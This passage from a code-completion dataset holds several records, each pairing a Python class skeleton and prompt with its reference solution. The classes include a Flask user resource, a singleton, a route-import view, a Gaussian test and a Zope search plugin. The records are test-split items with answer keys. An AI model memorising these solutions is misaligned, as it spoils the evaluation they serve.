200)\n except:\n abort(404, error=f'An error occurred while changing the user')\n<|end_body_1|>\n\n<|body_start_2|>\n user = UserModel.query.get(user_id)\n if not user:\n abort(404, error=f'User with id={user_id} is not exists')\n try:\n user.delete()\n return (f'User with id={user_id} deleted', 200)\n except:\n abort(404, error=f'An error occurred while deleting the user')\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000202", "length_bytes": 3510, "license_type": "no_license", "methods": [{"docstring": "Возвращает пользователя по id. :param user_id: id пользователя :return: пользователя", "name": "get", "signature": "def get(self, user_id)"}, {"docstring": "Изменяет пользователя по id. :param user_id: id пользователя :param kwargs: параметры для изменения пользователя :return: пользователя", "name": "put", "signature": "def put(self, user_id, **kwargs)"}, {"docstring": "Удаляет пользователя по id. :param user_id: id пользователя :return: пользователя", "name": "delete", "signature": "def delete(self, user_id)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_003268", "prompt": "Implement the Python class `UserResource` described below.\n\nClass description:\nImplement the UserResource class.\n\nMethod signatures and docstrings:\n- def get(self, user_id): Возвращает пользователя по id. :param user_id: id пользователя :return: пользователя\n- def put(self, user_id, **kwargs): Изменяет пользователя по id. :param user_id: id пользователя :param kwargs: параметры для изменения пользователя :return: пользователя\n- def delete(self, user_id): Удаляет пользователя по id. :param user_id: id пользователя :return: пользователя", "prompted_full_text": "Implement the Python class `UserResource` described below.\n\nClass description:\nImplement the UserResource class.\n\nMethod signatures and docstrings:\n- def get(self, user_id): Возвращает пользователя по id. :param user_id: id пользователя :return: пользователя\n- def put(self, user_id, **kwargs): Изменяет пользователя по id. :param user_id: id пользователя :param kwargs: параметры для изменения пользователя :return: пользователя\n- def delete(self, user_id): Удаляет пользователя по id. :param user_id: id пользователя :return: пользователя\n\n<|skeleton|>\nclass UserResource:\n\n def get(self, user_id):\n \"\"\"Возвращает пользователя по id. :param user_id: id пользователя :return: пользователя\"\"\"\n <|body_0|>\n\n def put(self, user_id, **kwargs):\n \"\"\"Изменяет пользователя по id. :param user_id: id пользователя :param kwargs: параметры для изменения пользователя :return: пользователя\"\"\"\n <|body_1|>\n\n def delete(self, user_id):\n \"\"\"Удаляет пользователя по id. :param user_id: id пользователя :return: пользователя\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n user = UserModel.query.get(user_id)\n if not user:\n abort(404, error=f'No user with id={user_id}')\n return (user, 200)\n<|end_body_0|>\n\n<|body_start_1|>\n user = UserModel.query.get(user_id)\n if not user:\n abort(404, error=f'No user with id={user_id}')\n user.username = kwargs['username']\n try:\n user.save()\n return (user, 200)\n except:\n abort(404, error=f'An error occurred while changing the user')\n<|end_body_1|>\n\n<|body_start_2|>\n user = UserModel.query.get(user_id)\n if not user:\n abort(404, error=f'User with id={user_id} is not exists')\n try:\n user.delete()\n return (f'User with id={user_id} deleted', 200)\n except:\n abort(404, error=f'An error occurred while deleting the user')\n<|end_body_2|>\n", "revision_id": "adb9a3f4524ab76e8ba656344e2ed452e87b577c", "skeleton": "<|skeleton|>\nclass UserResource:\n\n def get(self, user_id):\n \"\"\"Возвращает пользователя по id. :param user_id: id пользователя :return: пользователя\"\"\"\n <|body_0|>\n\n def put(self, user_id, **kwargs):\n \"\"\"Изменяет пользователя по id. :param user_id: id пользователя :param kwargs: параметры для изменения пользователя :return: пользователя\"\"\"\n <|body_1|>\n\n def delete(self, user_id):\n \"\"\"Удаляет пользователя по id. :param user_id: id пользователя :return: пользователя\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class UserResource:\n def get(self, user_id):\n \"\"\"Возвращает пользователя по id. :param user_id: id пользователя :return: пользователя\"\"\"\n user = UserModel.query.get(user_id)\n if not user:\n abort(404, error=f'No user with id={user_id}')\n return (user, 200)\n\n def put(self, user_id, **kwargs):\n \"\"\"Изменяет пользователя по id. :param user_id: id пользователя :param kwargs: параметры для изменения пользователя :return: пользователя\"\"\"\n user = UserModel.query.get(user_id)\n if not user:\n abort(404, error=f'No user with id={user_id}')\n user.username = kwargs['username']\n try:\n user.save()\n return (user, 200)\n except:\n abort(404, error=f'An error occurred while changing the user')\n\n def delete(self, user_id):\n \"\"\"Удаляет пользователя по id. :param user_id: id пользователя :return: пользователя\"\"\"\n user = UserModel.query.get(user_id)\n if not user:\n abort(404, error=f'User with id={user_id} is not exists')\n try:\n user.delete()\n return (f'User with id={user_id} deleted', 200)\n except:\n abort(404, error=f'An error occurred while deleting the user')\n", "source": "the_stack_v2_python_sparse", "source_path": "api/resources/user.py", "source_repo": "UshakovAleksandr/Blog", "split": "test", "star_events_count": 1} {"blob_id": "8d74211a93a897cb91c7b74138170917e9240673", "bodies": ["if BusSingleton.__instance__ is None:\n BusSingleton.__instance__ = bootstrap.bootstrap()\nelse:\n raise Exception('You cannot create another BusSingleton class')", "if not BusSingleton.__instance__:\n BusSingleton()\nreturn BusSingleton.__instance__"], "bodies_text": "<|body_start_0|>\n if BusSingleton.__instance__ is None:\n BusSingleton.__instance__ = bootstrap.bootstrap()\n else:\n raise Exception('You cannot create another BusSingleton class')\n<|end_body_0|>\n\n<|body_start_1|>\n if not BusSingleton.__instance__:\n BusSingleton()\n return BusSingleton.__instance__\n<|end_body_1|>\n", "class_docstring": "", "class_name": "BusSingleton", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass BusSingleton:\n\n def __init__(self):\n \"\"\"Constructor.\"\"\"\n <|body_0|>\n\n def get_instance():\n \"\"\"Static method to fetch the current instance.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if BusSingleton.__instance__ is None:\n BusSingleton.__instance__ = bootstrap.bootstrap()\n else:\n raise Exception('You cannot create another BusSingleton class')\n<|end_body_0|>\n\n<|body_start_1|>\n if not BusSingleton.__instance__:\n BusSingleton()\n return BusSingleton.__instance__\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000203", "length_bytes": 545, "license_type": "no_license", "methods": [{"docstring": "Constructor.", "name": "__init__", "signature": "def __init__(self)"}, {"docstring": "Static method to fetch the current instance.", "name": "get_instance", "signature": "def get_instance()"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_000717", "prompt": "Implement the Python class `BusSingleton` described below.\n\nClass description:\nImplement the BusSingleton class.\n\nMethod signatures and docstrings:\n- def __init__(self): Constructor.\n- def get_instance(): Static method to fetch the current instance.", "prompted_full_text": "Implement the Python class `BusSingleton` described below.\n\nClass description:\nImplement the BusSingleton class.\n\nMethod signatures and docstrings:\n- def __init__(self): Constructor.\n- def get_instance(): Static method to fetch the current instance.\n\n<|skeleton|>\nclass BusSingleton:\n\n def __init__(self):\n \"\"\"Constructor.\"\"\"\n <|body_0|>\n\n def get_instance():\n \"\"\"Static method to fetch the current instance.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if BusSingleton.__instance__ is None:\n BusSingleton.__instance__ = bootstrap.bootstrap()\n else:\n raise Exception('You cannot create another BusSingleton class')\n<|end_body_0|>\n\n<|body_start_1|>\n if not BusSingleton.__instance__:\n BusSingleton()\n return BusSingleton.__instance__\n<|end_body_1|>\n", "revision_id": "1f7f98953a46eb490a5fe8b427371d343f8b0bf6", "skeleton": "<|skeleton|>\nclass BusSingleton:\n\n def __init__(self):\n \"\"\"Constructor.\"\"\"\n <|body_0|>\n\n def get_instance():\n \"\"\"Static method to fetch the current instance.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class BusSingleton:\n def __init__(self):\n \"\"\"Constructor.\"\"\"\n if BusSingleton.__instance__ is None:\n BusSingleton.__instance__ = bootstrap.bootstrap()\n else:\n raise Exception('You cannot create another BusSingleton class')\n\n def get_instance():\n \"\"\"Static method to fetch the current instance.\"\"\"\n if not BusSingleton.__instance__:\n BusSingleton()\n return BusSingleton.__instance__\n", "source": "the_stack_v2_python_sparse", "source_path": "src/user-management/utils/bus_singleton.py", "source_repo": "asamehinmobly/User-Management", "split": "test", "star_events_count": 0} {"blob_id": "d67b74109768d9e365b61646f3162ea5ebbd4307", "bodies": ["initial = []\nfor prefix in result:\n description, objects = result[prefix]\n initial += [{'prefix': prefix, 'description': description, 'objects': ', '.join(objects)}]\nAddAddressFormSet = formset_factory(self.AddAddressForm, extra=0, can_delete=True)\nformset = AddAddressFormSet(initial=initial)\nreturn self.render(request, 'found.html', formset=formset)", "AddAddressFormSet = formset_factory(self.AddAddressForm, extra=0, can_delete=True)\nformset = AddAddressFormSet(request.POST)\nc = 0\nif formset.is_valid():\n vrf = VRF.get_global()\n asn = AS.default_as()\n for form in formset.forms:\n if 'DELETE' in form.cleaned_data and form.cleaned_data['DELETE']:\n continue\n try:\n prefix = IP.prefix(form.cleaned_data['prefix'])\n except AttributeError:\n continue\n description = form.cleaned_data['description']\n p, created = Prefix.objects.get_or_create(vrf=vrf, afi=prefix.afi, prefix=prefix.normalized.prefix, defaults={'asn': asn, 'description': description})\n if created:\n c += 1\nself.message_user(request, '%d prefixes are imported' % c)\nreturn self.response_redirect('ip:ipam:index')"], "bodies_text": "<|body_start_0|>\n initial = []\n for prefix in result:\n description, objects = result[prefix]\n initial += [{'prefix': prefix, 'description': description, 'objects': ', '.join(objects)}]\n AddAddressFormSet = formset_factory(self.AddAddressForm, extra=0, can_delete=True)\n formset = AddAddressFormSet(initial=initial)\n return self.render(request, 'found.html', formset=formset)\n<|end_body_0|>\n\n<|body_start_1|>\n AddAddressFormSet = formset_factory(self.AddAddressForm, extra=0, can_delete=True)\n formset = AddAddressFormSet(request.POST)\n c = 0\n if formset.is_valid():\n vrf = VRF.get_global()\n asn = AS.default_as()\n for form in formset.forms:\n if 'DELETE' in form.cleaned_data and form.cleaned_data['DELETE']:\n continue\n try:\n prefix = IP.prefix(form.cleaned_data['prefix'])\n except AttributeError:\n continue\n description = form.cleaned_data['description']\n p, created = Prefix.objects.get_or_create(vrf=vrf, afi=prefix.afi, prefix=prefix.normalized.prefix, defaults={'asn': asn, 'description': description})\n if created:\n c += 1\n self.message_user(request, '%d prefixes are imported' % c)\n return self.response_redirect('ip:ipam:index')\n<|end_body_1|>\n", "class_docstring": "Route import application", "class_name": "RouteImportAppplication", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass RouteImportAppplication:\n \"\"\"Route import application\"\"\"\n\n def render_result(self, request, result):\n \"\"\"Display form with imported data :param request: :param result: :return:\"\"\"\n <|body_0|>\n\n def view_submit(self, request):\n \"\"\"Submit imported data :param request: :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n initial = []\n for prefix in result:\n description, objects = result[prefix]\n initial += [{'prefix': prefix, 'description': description, 'objects': ', '.join(objects)}]\n AddAddressFormSet = formset_factory(self.AddAddressForm, extra=0, can_delete=True)\n formset = AddAddressFormSet(initial=initial)\n return self.render(request, 'found.html', formset=formset)\n<|end_body_0|>\n\n<|body_start_1|>\n AddAddressFormSet = formset_factory(self.AddAddressForm, extra=0, can_delete=True)\n formset = AddAddressFormSet(request.POST)\n c = 0\n if formset.is_valid():\n vrf = VRF.get_global()\n asn = AS.default_as()\n for form in formset.forms:\n if 'DELETE' in form.cleaned_data and form.cleaned_data['DELETE']:\n continue\n try:\n prefix = IP.prefix(form.cleaned_data['prefix'])\n except AttributeError:\n continue\n description = form.cleaned_data['description']\n p, created = Prefix.objects.get_or_create(vrf=vrf, afi=prefix.afi, prefix=prefix.normalized.prefix, defaults={'asn': asn, 'description': description})\n if created:\n c += 1\n self.message_user(request, '%d prefixes are imported' % c)\n return self.response_redirect('ip:ipam:index')\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000204", "length_bytes": 5449, "license_type": "permissive", "methods": [{"docstring": "Display form with imported data :param request: :param result: :return:", "name": "render_result", "signature": "def render_result(self, request, result)"}, {"docstring": "Submit imported data :param request: :return:", "name": "view_submit", "signature": "def view_submit(self, request)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003302", "prompt": "Implement the Python class `RouteImportAppplication` described below.\n\nClass description:\nRoute import application\n\nMethod signatures and docstrings:\n- def render_result(self, request, result): Display form with imported data :param request: :param result: :return:\n- def view_submit(self, request): Submit imported data :param request: :return:", "prompted_full_text": "Implement the Python class `RouteImportAppplication` described below.\n\nClass description:\nRoute import application\n\nMethod signatures and docstrings:\n- def render_result(self, request, result): Display form with imported data :param request: :param result: :return:\n- def view_submit(self, request): Submit imported data :param request: :return:\n\n<|skeleton|>\nclass RouteImportAppplication:\n \"\"\"Route import application\"\"\"\n\n def render_result(self, request, result):\n \"\"\"Display form with imported data :param request: :param result: :return:\"\"\"\n <|body_0|>\n\n def view_submit(self, request):\n \"\"\"Submit imported data :param request: :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n initial = []\n for prefix in result:\n description, objects = result[prefix]\n initial += [{'prefix': prefix, 'description': description, 'objects': ', '.join(objects)}]\n AddAddressFormSet = formset_factory(self.AddAddressForm, extra=0, can_delete=True)\n formset = AddAddressFormSet(initial=initial)\n return self.render(request, 'found.html', formset=formset)\n<|end_body_0|>\n\n<|body_start_1|>\n AddAddressFormSet = formset_factory(self.AddAddressForm, extra=0, can_delete=True)\n formset = AddAddressFormSet(request.POST)\n c = 0\n if formset.is_valid():\n vrf = VRF.get_global()\n asn = AS.default_as()\n for form in formset.forms:\n if 'DELETE' in form.cleaned_data and form.cleaned_data['DELETE']:\n continue\n try:\n prefix = IP.prefix(form.cleaned_data['prefix'])\n except AttributeError:\n continue\n description = form.cleaned_data['description']\n p, created = Prefix.objects.get_or_create(vrf=vrf, afi=prefix.afi, prefix=prefix.normalized.prefix, defaults={'asn': asn, 'description': description})\n if created:\n c += 1\n self.message_user(request, '%d prefixes are imported' % c)\n return self.response_redirect('ip:ipam:index')\n<|end_body_1|>\n", "revision_id": "2ab0ab7718bb7116da2c3953efd466757e11d9ce", "skeleton": "<|skeleton|>\nclass RouteImportAppplication:\n \"\"\"Route import application\"\"\"\n\n def render_result(self, request, result):\n \"\"\"Display form with imported data :param request: :param result: :return:\"\"\"\n <|body_0|>\n\n def view_submit(self, request):\n \"\"\"Submit imported data :param request: :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class RouteImportAppplication:\n \"\"\"Route import application\"\"\"\n\n def render_result(self, request, result):\n \"\"\"Display form with imported data :param request: :param result: :return:\"\"\"\n initial = []\n for prefix in result:\n description, objects = result[prefix]\n initial += [{'prefix': prefix, 'description': description, 'objects': ', '.join(objects)}]\n AddAddressFormSet = formset_factory(self.AddAddressForm, extra=0, can_delete=True)\n formset = AddAddressFormSet(initial=initial)\n return self.render(request, 'found.html', formset=formset)\n\n def view_submit(self, request):\n \"\"\"Submit imported data :param request: :return:\"\"\"\n AddAddressFormSet = formset_factory(self.AddAddressForm, extra=0, can_delete=True)\n formset = AddAddressFormSet(request.POST)\n c = 0\n if formset.is_valid():\n vrf = VRF.get_global()\n asn = AS.default_as()\n for form in formset.forms:\n if 'DELETE' in form.cleaned_data and form.cleaned_data['DELETE']:\n continue\n try:\n prefix = IP.prefix(form.cleaned_data['prefix'])\n except AttributeError:\n continue\n description = form.cleaned_data['description']\n p, created = Prefix.objects.get_or_create(vrf=vrf, afi=prefix.afi, prefix=prefix.normalized.prefix, defaults={'asn': asn, 'description': description})\n if created:\n c += 1\n self.message_user(request, '%d prefixes are imported' % c)\n return self.response_redirect('ip:ipam:index')\n", "source": "the_stack_v2_python_sparse", "source_path": "ip/apps/routeimport/views.py", "source_repo": "DreamerDDL/noc", "split": "test", "star_events_count": 0} {"blob_id": "b345a1dcc97a3f503fb4caee618f96f2578beac1", "bodies": ["sigma = 1.0\nsize = 5\nreal_values = 0.3678 * np.array([0.1357, 0.565, 1.266, 0.565, 0.1357])\nfor real, computed in zip(real_values, utils.discrete_gaussian(size, sigma)):\n self.assertAlmostEqual(real, computed, 3)", "sigma = 1.0\nsize = 6\nwith self.assertRaisesRegex(ValueError, '`size` must be odd.'):\n utils.discrete_gaussian(size, sigma)"], "bodies_text": "<|body_start_0|>\n sigma = 1.0\n size = 5\n real_values = 0.3678 * np.array([0.1357, 0.565, 1.266, 0.565, 0.1357])\n for real, computed in zip(real_values, utils.discrete_gaussian(size, sigma)):\n self.assertAlmostEqual(real, computed, 3)\n<|end_body_0|>\n\n<|body_start_1|>\n sigma = 1.0\n size = 6\n with self.assertRaisesRegex(ValueError, '`size` must be odd.'):\n utils.discrete_gaussian(size, sigma)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "utilsTest", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass utilsTest:\n\n def testDiscreteGaussian(self):\n \"\"\"Tests versus values computed using `https://keisan.casio.com/exec/system/1180573473`\"\"\"\n <|body_0|>\n\n def testDiscreteGaussianBadSize(self):\n \"\"\"Tests versus values computed using `https://keisan.casio.com/exec/system/1180573473`\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n sigma = 1.0\n size = 5\n real_values = 0.3678 * np.array([0.1357, 0.565, 1.266, 0.565, 0.1357])\n for real, computed in zip(real_values, utils.discrete_gaussian(size, sigma)):\n self.assertAlmostEqual(real, computed, 3)\n<|end_body_0|>\n\n<|body_start_1|>\n sigma = 1.0\n size = 6\n with self.assertRaisesRegex(ValueError, '`size` must be odd.'):\n utils.discrete_gaussian(size, sigma)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000205", "length_bytes": 833, "license_type": "no_license", "methods": [{"docstring": "Tests versus values computed using `https://keisan.casio.com/exec/system/1180573473`", "name": "testDiscreteGaussian", "signature": "def testDiscreteGaussian(self)"}, {"docstring": "Tests versus values computed using `https://keisan.casio.com/exec/system/1180573473`", "name": "testDiscreteGaussianBadSize", "signature": "def testDiscreteGaussianBadSize(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004807", "prompt": "Implement the Python class `utilsTest` described below.\n\nClass description:\nImplement the utilsTest class.\n\nMethod signatures and docstrings:\n- def testDiscreteGaussian(self): Tests versus values computed using `https://keisan.casio.com/exec/system/1180573473`\n- def testDiscreteGaussianBadSize(self): Tests versus values computed using `https://keisan.casio.com/exec/system/1180573473`", "prompted_full_text": "Implement the Python class `utilsTest` described below.\n\nClass description:\nImplement the utilsTest class.\n\nMethod signatures and docstrings:\n- def testDiscreteGaussian(self): Tests versus values computed using `https://keisan.casio.com/exec/system/1180573473`\n- def testDiscreteGaussianBadSize(self): Tests versus values computed using `https://keisan.casio.com/exec/system/1180573473`\n\n<|skeleton|>\nclass utilsTest:\n\n def testDiscreteGaussian(self):\n \"\"\"Tests versus values computed using `https://keisan.casio.com/exec/system/1180573473`\"\"\"\n <|body_0|>\n\n def testDiscreteGaussianBadSize(self):\n \"\"\"Tests versus values computed using `https://keisan.casio.com/exec/system/1180573473`\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n sigma = 1.0\n size = 5\n real_values = 0.3678 * np.array([0.1357, 0.565, 1.266, 0.565, 0.1357])\n for real, computed in zip(real_values, utils.discrete_gaussian(size, sigma)):\n self.assertAlmostEqual(real, computed, 3)\n<|end_body_0|>\n\n<|body_start_1|>\n sigma = 1.0\n size = 6\n with self.assertRaisesRegex(ValueError, '`size` must be odd.'):\n utils.discrete_gaussian(size, sigma)\n<|end_body_1|>\n", "revision_id": "39598b528fec061e828f64a3ded35aebeacb442e", "skeleton": "<|skeleton|>\nclass utilsTest:\n\n def testDiscreteGaussian(self):\n \"\"\"Tests versus values computed using `https://keisan.casio.com/exec/system/1180573473`\"\"\"\n <|body_0|>\n\n def testDiscreteGaussianBadSize(self):\n \"\"\"Tests versus values computed using `https://keisan.casio.com/exec/system/1180573473`\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class utilsTest:\n def testDiscreteGaussian(self):\n \"\"\"Tests versus values computed using `https://keisan.casio.com/exec/system/1180573473`\"\"\"\n sigma = 1.0\n size = 5\n real_values = 0.3678 * np.array([0.1357, 0.565, 1.266, 0.565, 0.1357])\n for real, computed in zip(real_values, utils.discrete_gaussian(size, sigma)):\n self.assertAlmostEqual(real, computed, 3)\n\n def testDiscreteGaussianBadSize(self):\n \"\"\"Tests versus values computed using `https://keisan.casio.com/exec/system/1180573473`\"\"\"\n sigma = 1.0\n size = 6\n with self.assertRaisesRegex(ValueError, '`size` must be odd.'):\n utils.discrete_gaussian(size, sigma)\n", "source": "the_stack_v2_python_sparse", "source_path": "simulation/utils_test.py", "source_repo": "chulab/super_resolution", "split": "test", "star_events_count": 3} {"blob_id": "551069db97d0a25bc911126cef3481d39bf1fccb", "bodies": ["self.id = id\nself.title = title\nself.delegate = delegate_path", "uf = getattr(aq_base(self), 'acl_users', None)\nif uf is None and self.delegate:\n uf = self.unrestrictedTraverse(self.delegate)\nreturn uf", "acl = self._getDelegate()\nif acl is None:\n return ()\nreturn acl.searchUsers(id=id, login=login, exact_match=exact_match, sort_by=sort_by, max_results=max_results, **kw)", "acl = self._getDelegate()\nif acl is None:\n return ()\nreturn acl.searchGroups(id=id, exact_match=exact_match, sort_by=sort_by, max_results=max_results, **kw)"], "bodies_text": "<|body_start_0|>\n self.id = id\n self.title = title\n self.delegate = delegate_path\n<|end_body_0|>\n\n<|body_start_1|>\n uf = getattr(aq_base(self), 'acl_users', None)\n if uf is None and self.delegate:\n uf = self.unrestrictedTraverse(self.delegate)\n return uf\n<|end_body_1|>\n\n<|body_start_2|>\n acl = self._getDelegate()\n if acl is None:\n return ()\n return acl.searchUsers(id=id, login=login, exact_match=exact_match, sort_by=sort_by, max_results=max_results, **kw)\n<|end_body_2|>\n\n<|body_start_3|>\n acl = self._getDelegate()\n if acl is None:\n return ()\n return acl.searchGroups(id=id, exact_match=exact_match, sort_by=sort_by, max_results=max_results, **kw)\n<|end_body_3|>\n", "class_docstring": "SearchPrincipalsPlugin delegates its enumerateUsers and enumerateGroups methods to a delegate object", "class_name": "SearchPrincipalsPlugin", "detected_licenses": ["ZPL-2.1"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SearchPrincipalsPlugin:\n \"\"\"SearchPrincipalsPlugin delegates its enumerateUsers and enumerateGroups methods to a delegate object\"\"\"\n\n def __init__(self, id, title='', delegate_path=''):\n \"\"\"Initialize a new instance\"\"\"\n <|body_0|>\n\n def _getDelegate(self):\n \"\"\"Safely retrieve a PluggableAuthService to work with\"\"\"\n <|body_1|>\n\n def enumerateUsers(self, id=None, login=None, exact_match=0, sort_by=None, max_results=None, **kw):\n \"\"\"see IUserEnumerationPlugin\"\"\"\n <|body_2|>\n\n def enumerateGroups(self, id=None, exact_match=0, sort_by=None, max_results=None, **kw):\n \"\"\"see IGroupEnumerationPlugin\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.id = id\n self.title = title\n self.delegate = delegate_path\n<|end_body_0|>\n\n<|body_start_1|>\n uf = getattr(aq_base(self), 'acl_users', None)\n if uf is None and self.delegate:\n uf = self.unrestrictedTraverse(self.delegate)\n return uf\n<|end_body_1|>\n\n<|body_start_2|>\n acl = self._getDelegate()\n if acl is None:\n return ()\n return acl.searchUsers(id=id, login=login, exact_match=exact_match, sort_by=sort_by, max_results=max_results, **kw)\n<|end_body_2|>\n\n<|body_start_3|>\n acl = self._getDelegate()\n if acl is None:\n return ()\n return acl.searchGroups(id=id, exact_match=exact_match, sort_by=sort_by, max_results=max_results, **kw)\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000206", "length_bytes": 3727, "license_type": "permissive", "methods": [{"docstring": "Initialize a new instance", "name": "__init__", "signature": "def __init__(self, id, title='', delegate_path='')"}, {"docstring": "Safely retrieve a PluggableAuthService to work with", "name": "_getDelegate", "signature": "def _getDelegate(self)"}, {"docstring": "see IUserEnumerationPlugin", "name": "enumerateUsers", "signature": "def enumerateUsers(self, id=None, login=None, exact_match=0, sort_by=None, max_results=None, **kw)"}, {"docstring": "see IGroupEnumerationPlugin", "name": "enumerateGroups", "signature": "def enumerateGroups(self, id=None, exact_match=0, sort_by=None, max_results=None, **kw)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_000605", "prompt": "Implement the Python class `SearchPrincipalsPlugin` described below.\n\nClass description:\nSearchPrincipalsPlugin delegates its enumerateUsers and enumerateGroups methods to a delegate object\n\nMethod signatures and docstrings:\n- def __init__(self, id, title='', delegate_path=''): Initialize a new instance\n- def _getDelegate(self): Safely retrieve a PluggableAuthService to work with\n- def enumerateUsers(self, id=None, login=None, exact_match=0, sort_by=None, max_results=None, **kw): see IUserEnumerationPlugin\n- def enumerateGroups(self, id=None, exact_match=0, sort_by=None, max_results=None, **kw): see IGroupEnumerationPlugin", "prompted_full_text": "Implement the Python class `SearchPrincipalsPlugin` described below.\n\nClass description:\nSearchPrincipalsPlugin delegates its enumerateUsers and enumerateGroups methods to a delegate object\n\nMethod signatures and docstrings:\n- def __init__(self, id, title='', delegate_path=''): Initialize a new instance\n- def _getDelegate(self): Safely retrieve a PluggableAuthService to work with\n- def enumerateUsers(self, id=None, login=None, exact_match=0, sort_by=None, max_results=None, **kw): see IUserEnumerationPlugin\n- def enumerateGroups(self, id=None, exact_match=0, sort_by=None, max_results=None, **kw): see IGroupEnumerationPlugin\n\n<|skeleton|>\nclass SearchPrincipalsPlugin:\n \"\"\"SearchPrincipalsPlugin delegates its enumerateUsers and enumerateGroups methods to a delegate object\"\"\"\n\n def __init__(self, id, title='', delegate_path=''):\n \"\"\"Initialize a new instance\"\"\"\n <|body_0|>\n\n def _getDelegate(self):\n \"\"\"Safely retrieve a PluggableAuthService to work with\"\"\"\n <|body_1|>\n\n def enumerateUsers(self, id=None, login=None, exact_match=0, sort_by=None, max_results=None, **kw):\n \"\"\"see IUserEnumerationPlugin\"\"\"\n <|body_2|>\n\n def enumerateGroups(self, id=None, exact_match=0, sort_by=None, max_results=None, **kw):\n \"\"\"see IGroupEnumerationPlugin\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.id = id\n self.title = title\n self.delegate = delegate_path\n<|end_body_0|>\n\n<|body_start_1|>\n uf = getattr(aq_base(self), 'acl_users', None)\n if uf is None and self.delegate:\n uf = self.unrestrictedTraverse(self.delegate)\n return uf\n<|end_body_1|>\n\n<|body_start_2|>\n acl = self._getDelegate()\n if acl is None:\n return ()\n return acl.searchUsers(id=id, login=login, exact_match=exact_match, sort_by=sort_by, max_results=max_results, **kw)\n<|end_body_2|>\n\n<|body_start_3|>\n acl = self._getDelegate()\n if acl is None:\n return ()\n return acl.searchGroups(id=id, exact_match=exact_match, sort_by=sort_by, max_results=max_results, **kw)\n<|end_body_3|>\n", "revision_id": "f0fde29f4c865a4e0908d22c19a0a72810b0a24f", "skeleton": "<|skeleton|>\nclass SearchPrincipalsPlugin:\n \"\"\"SearchPrincipalsPlugin delegates its enumerateUsers and enumerateGroups methods to a delegate object\"\"\"\n\n def __init__(self, id, title='', delegate_path=''):\n \"\"\"Initialize a new instance\"\"\"\n <|body_0|>\n\n def _getDelegate(self):\n \"\"\"Safely retrieve a PluggableAuthService to work with\"\"\"\n <|body_1|>\n\n def enumerateUsers(self, id=None, login=None, exact_match=0, sort_by=None, max_results=None, **kw):\n \"\"\"see IUserEnumerationPlugin\"\"\"\n <|body_2|>\n\n def enumerateGroups(self, id=None, exact_match=0, sort_by=None, max_results=None, **kw):\n \"\"\"see IGroupEnumerationPlugin\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SearchPrincipalsPlugin:\n \"\"\"SearchPrincipalsPlugin delegates its enumerateUsers and enumerateGroups methods to a delegate object\"\"\"\n\n def __init__(self, id, title='', delegate_path=''):\n \"\"\"Initialize a new instance\"\"\"\n self.id = id\n self.title = title\n self.delegate = delegate_path\n\n def _getDelegate(self):\n \"\"\"Safely retrieve a PluggableAuthService to work with\"\"\"\n uf = getattr(aq_base(self), 'acl_users', None)\n if uf is None and self.delegate:\n uf = self.unrestrictedTraverse(self.delegate)\n return uf\n\n def enumerateUsers(self, id=None, login=None, exact_match=0, sort_by=None, max_results=None, **kw):\n \"\"\"see IUserEnumerationPlugin\"\"\"\n acl = self._getDelegate()\n if acl is None:\n return ()\n return acl.searchUsers(id=id, login=login, exact_match=exact_match, sort_by=sort_by, max_results=max_results, **kw)\n\n def enumerateGroups(self, id=None, exact_match=0, sort_by=None, max_results=None, **kw):\n \"\"\"see IGroupEnumerationPlugin\"\"\"\n acl = self._getDelegate()\n if acl is None:\n return ()\n return acl.searchGroups(id=id, exact_match=exact_match, sort_by=sort_by, max_results=max_results, **kw)\n", "source": "the_stack_v2_python_sparse", "source_path": "src/Products/PluggableAuthService/plugins/SearchPrincipalsPlugin.py", "source_repo": "zopefoundation/Products.PluggableAuthService", "split": "test", "star_events_count": 8} {"blob_id": "32ac3e836e2b4ebc1cd375581b35c9db3bbc99d2", "bodies": ["ana_id = super(hr_department, self).create(vals)\nif self.manager_id.id != False and 